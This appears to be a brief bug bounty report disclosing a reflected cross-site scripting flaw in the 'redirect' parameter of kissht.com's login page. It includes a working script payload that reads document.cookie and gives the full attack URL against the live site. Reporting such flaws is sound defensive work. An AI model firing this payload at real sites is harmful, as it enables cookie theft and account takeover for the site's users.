Vulnerability Name : Cross Site Scripting - (on user login and signup entering page)
Vulnerable URL : https://kissht.com/login?redirect=%22hello%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Vulnerable Parameter : redirect
Vulnerable Payload : "hello"/><script>alert(document.cookie)</script>
How to reproduce this issue:
1. Visit the url it will give an XSS popup.
https://kissht.com/login?redirect=%22hello%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
POC :
Screenshort can be found in the attachment.
633